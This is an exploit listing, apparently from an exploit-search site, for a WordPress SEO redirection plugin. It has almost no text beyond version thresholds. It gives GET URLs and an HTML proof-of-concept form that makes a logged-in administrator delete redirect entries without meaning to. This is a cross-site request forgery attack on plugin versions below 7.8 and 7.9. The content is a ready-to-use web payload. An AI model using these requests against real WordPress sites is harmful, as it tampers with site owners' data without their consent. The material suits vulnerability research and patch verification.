Share
## https://sploitus.com/exploit?id=WPEX-ID:F85BF3C3-75AA-485C-A8AC-2F58C0C960E1
v < 7.8
https://example.com/wp-admin/options-general.php?page=seo-redirection.php&tab=cutom&del=1
https://example.com/wp-admin/options-general.php?page=seo-redirection.php&tab=posts&del=1

v < 7.9
<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=seo-redirection.php" method="POST">
      <input type="hidden" name="check_all" value="on" />
      <input type="hidden" name="redirect_id[]" value="9" />
      <input type="hidden" name="redirect_id[]" value="10" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>